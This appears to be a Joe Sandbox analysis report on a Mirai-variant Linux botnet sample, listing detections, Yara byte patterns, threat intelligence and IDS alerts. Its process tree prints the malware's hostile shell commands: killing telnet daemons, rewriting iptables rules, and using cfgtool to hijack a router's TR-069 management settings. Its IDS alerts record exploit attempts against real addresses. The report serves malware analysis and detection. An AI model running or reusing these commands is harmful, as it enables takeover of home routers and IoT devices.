Edit tour

Linux Analysis Report
bin.sh.elf

Overview

General Information

Sample name:	bin.sh.elf
Analysis ID:	1564319
MD5:	08b9c0cce72be9d0593fb14d67780bff
SHA1:	bba44d9dc631607564fbdd7483361099f5bb55e7
SHA256:	72b9f5286030ea745a84f0b10e7650e13ca9f77a8a6c1fb6f2e30c7acf04fa9f
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Mirai

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Executes the "iptables" command to insert, remove and/or manipulate rules

Opens /proc/net/* files useful for finding connected devices and routers

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Terminates several processes with shell command 'killall'

Uses known network protocols on non-standard ports

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "iptables" command used for managing IP filtering and manipulation

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

HTTP GET or POST without a user agent

Reads system information from the proc file system

Reads the 'hosts' file potentially containing internal network hosts

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Suricata IDS alerts with low severity for network traffic

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes HTML files containing JavaScript to disk

Writes shell script files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564319
Start date and time:	2024-11-28 07:27:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	bin.sh.elf
Detection:	MAL
Classification:	mal100.spre.troj.evad.linELF@0/486@73/0

Warnings

HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
VT rate limit hit for: bin.sh.elf

Runtime Messages

Command:	/tmp/bin.sh.elf
PID:	6240
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	telnetd: no process found utelnetd: no process found scfgmgr: no process found Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 /bin/sh: 1: cfgtool: not found /bin/sh: 1: cfgtool: not found Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6219, Parent: 4331)

rm (PID: 6219, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4

dash New Fork (PID: 6220, Parent: 4331)

cat (PID: 6220, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.xtr71Z5d7V

dash New Fork (PID: 6221, Parent: 4331)

head (PID: 6221, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 6222, Parent: 4331)

tr (PID: 6222, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 6223, Parent: 4331)

cut (PID: 6223, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 6224, Parent: 4331)

cat (PID: 6224, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.xtr71Z5d7V

dash New Fork (PID: 6225, Parent: 4331)

head (PID: 6225, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 6226, Parent: 4331)

tr (PID: 6226, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 6227, Parent: 4331)

cut (PID: 6227, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 6228, Parent: 4331)

rm (PID: 6228, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4

bin.sh.elf (PID: 6240, Parent: 6150, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/bin.sh.elf

bin.sh.elf New Fork (PID: 6242, Parent: 6240)

bin.sh.elf New Fork (PID: 6244, Parent: 6242)

bin.sh.elf New Fork (PID: 6246, Parent: 6244)

sh (PID: 6246, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

sh New Fork (PID: 6252, Parent: 6246)

killall (PID: 6252, Parent: 6246, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr

bin.sh.elf New Fork (PID: 6253, Parent: 6244)

bin.sh.elf New Fork (PID: 6255, Parent: 6244)

bin.sh.elf New Fork (PID: 6257, Parent: 6244)

bin.sh.elf New Fork (PID: 6273, Parent: 6257)

sh (PID: 6273, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT"

sh New Fork (PID: 6275, Parent: 6273)

iptables (PID: 6275, Parent: 6273, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6280, Parent: 6257)

sh (PID: 6280, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT"

sh New Fork (PID: 6282, Parent: 6280)

iptables (PID: 6282, Parent: 6280, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6283, Parent: 6257)

sh (PID: 6283, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT"

sh New Fork (PID: 6285, Parent: 6283)

iptables (PID: 6285, Parent: 6283, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6288, Parent: 6257)

sh (PID: 6288, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT"

sh New Fork (PID: 6290, Parent: 6288)

iptables (PID: 6290, Parent: 6288, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6291, Parent: 6257)

sh (PID: 6291, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 57285 -j ACCEPT"

sh New Fork (PID: 6293, Parent: 6291)

iptables (PID: 6293, Parent: 6291, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6294, Parent: 6257)

sh (PID: 6294, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT"

sh New Fork (PID: 6296, Parent: 6294)

iptables (PID: 6296, Parent: 6294, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6297, Parent: 6257)

sh (PID: 6297, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT"

sh New Fork (PID: 6299, Parent: 6297)

iptables (PID: 6299, Parent: 6297, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6300, Parent: 6257)

sh (PID: 6300, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT"

sh New Fork (PID: 6302, Parent: 6300)

iptables (PID: 6302, Parent: 6300, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT

bin.sh.elf New Fork (PID: 6261, Parent: 6244)

bin.sh.elf New Fork (PID: 6265, Parent: 6244)

bin.sh.elf New Fork (PID: 6271, Parent: 6244)

bin.sh.elf New Fork (PID: 6326, Parent: 6244)

sh (PID: 6326, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

sh New Fork (PID: 6328, Parent: 6326)

iptables (PID: 6328, Parent: 6326, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP

bin.sh.elf New Fork (PID: 6329, Parent: 6244)

sh (PID: 6329, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

sh New Fork (PID: 6331, Parent: 6329)

iptables (PID: 6331, Parent: 6329, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

bin.sh.elf New Fork (PID: 6332, Parent: 6244)

sh (PID: 6332, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

sh New Fork (PID: 6334, Parent: 6332)

iptables (PID: 6334, Parent: 6332, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP

bin.sh.elf New Fork (PID: 6335, Parent: 6244)

sh (PID: 6335, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

sh New Fork (PID: 6337, Parent: 6335)

iptables (PID: 6337, Parent: 6335, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP

bin.sh.elf New Fork (PID: 6338, Parent: 6244)

sh (PID: 6338, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

bin.sh.elf New Fork (PID: 6340, Parent: 6244)

sh (PID: 6340, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

bin.sh.elf New Fork (PID: 6342, Parent: 6244)

sh (PID: 6342, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

sh New Fork (PID: 6344, Parent: 6342)

iptables (PID: 6344, Parent: 6342, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP

bin.sh.elf New Fork (PID: 6345, Parent: 6244)

sh (PID: 6345, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

sh New Fork (PID: 6347, Parent: 6345)

iptables (PID: 6347, Parent: 6345, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP

bin.sh.elf New Fork (PID: 6348, Parent: 6244)

sh (PID: 6348, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

sh New Fork (PID: 6350, Parent: 6348)

iptables (PID: 6350, Parent: 6348, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

bin.sh.elf New Fork (PID: 6351, Parent: 6244)

sh (PID: 6351, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

sh New Fork (PID: 6353, Parent: 6351)

iptables (PID: 6353, Parent: 6351, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

bin.sh.elf New Fork (PID: 6354, Parent: 6244)

sh (PID: 6354, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

sh New Fork (PID: 6356, Parent: 6354)

iptables (PID: 6356, Parent: 6354, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP

bin.sh.elf New Fork (PID: 6357, Parent: 6244)

sh (PID: 6357, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

sh New Fork (PID: 6359, Parent: 6357)

iptables (PID: 6359, Parent: 6357, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

bin.sh.elf New Fork (PID: 6360, Parent: 6244)

sh (PID: 6360, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

sh New Fork (PID: 6366, Parent: 6360)

iptables (PID: 6366, Parent: 6360, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP

bin.sh.elf New Fork (PID: 6367, Parent: 6244)

sh (PID: 6367, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

sh New Fork (PID: 6369, Parent: 6367)

iptables (PID: 6369, Parent: 6367, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP

bin.sh.elf New Fork (PID: 6372, Parent: 6244)

sh (PID: 6372, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

sh New Fork (PID: 6377, Parent: 6372)

iptables (PID: 6377, Parent: 6372, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP

bin.sh.elf New Fork (PID: 6378, Parent: 6244)

sh (PID: 6378, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

sh New Fork (PID: 6380, Parent: 6378)

iptables (PID: 6380, Parent: 6378, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP

bin.sh.elf New Fork (PID: 6382, Parent: 6244)

sh (PID: 6382, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

sh New Fork (PID: 6387, Parent: 6382)

iptables (PID: 6387, Parent: 6382, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP

bin.sh.elf New Fork (PID: 6388, Parent: 6244)

sh (PID: 6388, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

sh New Fork (PID: 6393, Parent: 6388)

iptables (PID: 6393, Parent: 6388, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP

bin.sh.elf New Fork (PID: 6399, Parent: 6244)

sh (PID: 6399, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT"

sh New Fork (PID: 6401, Parent: 6399)

iptables (PID: 6401, Parent: 6399, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6402, Parent: 6244)

sh (PID: 6402, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT"

sh New Fork (PID: 6404, Parent: 6402)

iptables (PID: 6404, Parent: 6402, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6405, Parent: 6244)

sh (PID: 6405, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT"

sh New Fork (PID: 6407, Parent: 6405)

iptables (PID: 6407, Parent: 6405, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6408, Parent: 6244)

sh (PID: 6408, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT"

sh New Fork (PID: 6414, Parent: 6408)

iptables (PID: 6414, Parent: 6408, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6415, Parent: 6244)

sh (PID: 6415, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 60815 -j ACCEPT"

sh New Fork (PID: 6420, Parent: 6415)

iptables (PID: 6420, Parent: 6415, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6421, Parent: 6244)

sh (PID: 6421, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT"

sh New Fork (PID: 6426, Parent: 6421)

iptables (PID: 6426, Parent: 6421, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6427, Parent: 6244)

sh (PID: 6427, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT"

sh New Fork (PID: 6432, Parent: 6427)

iptables (PID: 6432, Parent: 6427, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT

bin.sh.elf New Fork (PID: 6433, Parent: 6244)

sh (PID: 6433, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT"

sh New Fork (PID: 6438, Parent: 6433)

iptables (PID: 6438, Parent: 6433, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
bin.sh.elf	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
bin.sh.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
bin.sh.elf	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
bin.sh.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
bin.sh.elf	Linux_Trojan_Mirai_5c62e6b2	unknown	unknown	0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
bin.sh.elf	Linux_Trojan_Mirai_77137320	unknown	unknown	0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
bin.sh.elf	Linux_Trojan_Mirai_ac253e4f	unknown	unknown	0x383b3:$a: 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/networks	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/usr/networks	Linux_Trojan_Mirai_5c62e6b2	unknown	unknown	0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
/usr/networks	Linux_Trojan_Mirai_77137320	unknown	unknown	0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
/usr/networks	Linux_Trojan_Mirai_ac253e4f	unknown	unknown	0x383b3:$a: 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6242.1.00007fb730060000.00007fb73006a000.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
6242.1.00007fb730060000.00007fb73006a000.rw-.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6240.1.00007fb730060000.00007fb73006a000.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
6240.1.00007fb730060000.00007fb73006a000.rw-.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_5c62e6b2	unknown	unknown	0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_77137320	unknown	unknown	0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
6242.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_ac253e4f	unknown	unknown	0x383b3:$a: 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_5c62e6b2	unknown	unknown	0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_77137320	unknown	unknown	0x384f5:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
6240.1.00007fb730017000.00007fb730058000.r-x.sdmp	Linux_Trojan_Mirai_ac253e4f	unknown	unknown	0x383b3:$a: 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D
Process Memory Space: bin.sh.elf PID: 6240	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: bin.sh.elf PID: 6242	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: bin.sh.elf PID: 6242	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: bin.sh.elf PID: 6242	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Click to see the 15 entries

Suricata Signatures

ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T07:28:00.893883+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	36606	12.244.152.154	80	TCP
2024-11-28T07:28:09.506579+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	48422	13.35.2.160	8080	TCP
2024-11-28T07:28:09.511709+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	53158	54.104.73.193	8080	TCP
2024-11-28T07:28:09.516467+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	44670	106.43.212.137	8080	TCP
2024-11-28T07:28:09.519383+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38496	31.195.52.61	80	TCP
2024-11-28T07:28:09.519767+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	41564	92.194.65.27	8080	TCP
2024-11-28T07:28:09.520487+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	38606	105.13.161.144	80	TCP
2024-11-28T07:28:09.522015+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	40038	201.195.59.217	80	TCP
2024-11-28T07:28:09.522780+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	55732	27.105.227.249	80	TCP
2024-11-28T07:28:09.525388+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	36276	79.128.124.157	80	TCP
2024-11-28T07:28:09.525767+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	50332	116.81.240.7	8080	TCP
2024-11-28T07:28:09.528036+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	47412	28.196.179.23	8080	TCP
2024-11-28T07:28:09.532902+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	60754	45.112.243.18	8080	TCP
2024-11-28T07:28:09.536696+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	46998	203.226.247.235	80	TCP
2024-11-28T07:28:09.543576+0100	2029215	1	Attempted Administrator Privilege Gain	192.168.2.23	45032	9.130.45.96	80	TCP
